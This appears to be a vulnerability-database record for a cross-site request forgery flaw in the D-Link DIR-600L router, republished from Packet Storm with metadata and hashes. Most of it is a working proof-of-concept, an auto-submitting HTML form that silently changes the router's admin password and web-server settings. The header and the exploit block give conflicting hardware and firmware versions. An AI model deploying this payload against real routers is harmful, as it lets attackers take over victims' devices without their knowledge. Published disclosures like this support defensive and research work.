Details of VAR-E-201403-0276

ID

VAR-E-201403-0276

TITLE

D-Link DIR-600L Cross Site Request Forgery

Trust: 0.5

sources: PACKETSTORM: 125815

DESCRIPTION

D-Link DIR-600L hardware version AX and firmware version 1.00 suffers from a cross site request forgery vulnerability.

Trust: 0.5

sources: PACKETSTORM: 125815

AFFECTED PRODUCTS

vendor:

d link

model:

dir-600l

scope:

version:

Trust: 0.5

sources: PACKETSTORM: 125815

EXPLOIT

####################################################################################

# Exploit Title: Dlink DIR-600L Hardware Version AX Firmware Version 1.00 CSRF Vulnerability
# Google Dork: N/A
# Date: 20/03/2014
# Exploit Author: Dhruv Shah
# Vendor Homepage: http://www.dlink.com/us/en/home-solutions/connect/routers/dir-600l-wireless-n-150-home-cloud-router
# Software Link: N/A
# Hardware Version:E4

# Firmware Version:5.10
# Tested on: Router Web Server
# CVE : N/A

###################################################################################

Cross Site Request Forgery

This Modem's Web Application , suffers from Cross-site request forgery

through which attacker can manipulate user data via sending him malicious

craft url.

The Modems's Application not using any security token to prevent it

against CSRF. You can manipulate any userdata. PoC and Exploit to change

user password:

In the POC the IP address in the POST is the modems IP address.

<html>

<body>
<form id ="poc" action="http://192.168.0.1/goform/formSetPassword"
method="POST">
<input type="hidden" name="settingsChanged" value="1" />
<input type="hidden" name="config.login_name" value="admin" />
<input type="hidden" name="config.password" value="YWRtaW4A" />
<input type="hidden"
name="config.web_server_allow_graphics_auth"
value="false" />
<input type="hidden"
name="config.web_server_allow_wan_http" value="false" />
<input type="hidden"
name="config.web_server_wan_port_http" value="8080" />
<input type="hidden"
name="config.wan_web_ingress_filter_name" value="" />
<input type="hidden" name="wan_ingress_filter_details"
value="" />
</form>
</body>
<script type="text/javascript">
document.getElementById("poc").submit();
</script>

</html>

______________________

*Dhruv Shah* *aka Snypter*

Blogger | Researcher | Consultant | Writer
Youtube <http://www.youtube.com/snypter> |
Facebook<http://www.facebook.com/dhruvshahs>|
Linkedin <http://in.linkedin.com/pub/dhruv-shah/26/4a6/aa0> |
Twitter<https://twitter.com/Snypter>|
Blog <http://security-geek.in/blog/>

Trust: 0.5

sources: PACKETSTORM: 125815

EXPLOIT HASH

LOCAL

SOURCE

md5:	8cb469bac7accc74cd1f462560b56d45
sha-1:	f46d321584cf74dd006483551e3e7f94f86e8956
sha-256:	b631009354d41628f2c1a41d39df88b0765f8bdcbeae0b5ff610a03d682399e6

md5:	8cb469bac7accc74cd1f462560b56d45

Trust: 0.5

sources: PACKETSTORM: 125815

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 125815

TYPE

csrf

Trust: 0.5

sources: PACKETSTORM: 125815

CREDITS

Dhruv Shah

Trust: 0.5

sources: PACKETSTORM: 125815

EXTERNAL IDS

db:

PACKETSTORM

id:

125815

Trust: 0.5

sources: PACKETSTORM: 125815

SOURCES

db:

PACKETSTORM

id:

125815

LAST UPDATE DATE

2022-07-27T09:21:53.238000+00:00

SOURCES RELEASE DATE

db:

PACKETSTORM

id:

125815

date:

2014-03-20T20:55:55

ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT HASH

LOCAL

SOURCE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

SOURCES

LAST UPDATE DATE

SOURCES RELEASE DATE